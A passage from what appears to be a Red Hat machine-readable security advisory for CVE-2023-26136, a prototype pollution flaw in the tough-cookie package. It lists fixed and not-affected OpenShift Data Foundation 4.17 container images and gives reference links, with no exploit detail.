"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2219310"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tough-cookie: prototype pollution in cookie memstore",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26136"
},
{
"category": "external",
"summary": "RHBZ#2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e",
